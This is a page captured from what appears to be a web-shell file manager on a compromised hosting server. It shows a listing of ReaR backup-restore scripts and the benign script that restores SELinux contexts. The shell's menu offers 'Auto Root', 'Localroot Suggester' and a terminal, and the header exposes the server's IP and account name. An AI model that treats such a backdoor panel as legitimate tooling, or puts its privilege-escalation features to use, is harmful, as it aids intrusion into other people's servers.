Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.110
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
restore /
YUM /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
100_mount_YUM_path.sh
140
B
-rw-r--r--
2026-04-01 09:39
400_restore_packages.sh
10.62
KB
-rw-r--r--
2026-04-01 09:39
403_binds_for_selinux.sh
772
B
-rw-r--r--
2026-04-01 09:39
405_recreate_users_and_groups.sh
5.05
KB
-rw-r--r--
2026-04-01 09:39
410_restore_backup.sh
17.24
KB
-rw-r--r--
2026-04-01 09:39
600_restore_selinux_contexts.sh
1.81
KB
-rw-r--r--
2026-04-01 09:39
940_generate_fstab.sh
5
KB
-rw-r--r--
2026-04-01 09:39
950_grub2_mkconfig.sh
2.17
KB
-rw-r--r--
2026-04-01 09:39
950_grub_mkconfig.sh
1.93
KB
-rw-r--r--
2026-04-01 09:39
970_set_root_password.sh
2.14
KB
-rw-r--r--
2026-04-01 09:39
980_initial_network_setup.sh
3.38
KB
-rw-r--r--
2026-04-01 09:39
980_umount_YUM_dir.sh
154
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# # restore/YUM/default/600_restore_selinux_contexts.sh # # For BACKUP=YUM the SELinux security context data for all files can be stored for # the ReaR recovery system via backup/YUM/default/600_capture_selinux_contexts.sh # to ensure that the contexts are precisely replicated. # Only available if YUM_BACKUP_FILES is set to create a file archive. if ! is_true "$YUM_BACKUP_FILES" ; then LogPrint "Not restoring SELinux contexts (YUM_BACKUP_FILES=$YUM_BACKUP_FILES)" return fi if ! is_true "$YUM_BACKUP_SELINUX_CONTEXTS" ; then LogPrint "Not restoring SELinux contexts (YUM_BACKUP_SELINUX_CONTEXTS=$YUM_BACKUP_SELINUX_CONTEXTS)" return fi LogPrint "Restoring SELinux contexts (YUM_BACKUP_SELINUX_CONTEXTS=$YUM_BACKUP_SELINUX_CONTEXTS)" # Try to care about possible errors # see https://github.com/rear/rear/wiki/Coding-Style set -e -u -o pipefail cat $( dirname "$backuparchive" )/selinux_contexts.dat | chroot $TARGET_FS_ROOT/ xargs -n 2 chcon -h $v # SELinux policy can become invalid if installed too early in the restore process, so reinstall it to ensure # that it is valid after we've restored the SELinux contexts if rpm_package=$(rpm $v --root $TARGET_FS_ROOT --query selinux-policy-targeted) ; then rpm_package_name_version="${rpm_package%-*}" rpm_package_name="${rpm_package_name_version%-*}" LogPrint "Reinstalling $rpm_package_name" # Sometimes the version of the package isn't available to reinstall, so if reinstall # fails, do a regular package upgrade yum $verbose --installroot=$TARGET_FS_ROOT -y reinstall "$rpm_package_name" 1>&2 || \ yum $verbose --installroot=$TARGET_FS_ROOT -y upgrade "$rpm_package_name" 1>&2 fi # Restore the ReaR default bash flags and options (see usr/sbin/rear): apply_bash_flags_and_options_commands "$DEFAULT_BASH_FLAGS_AND_OPTIONS_COMMANDS"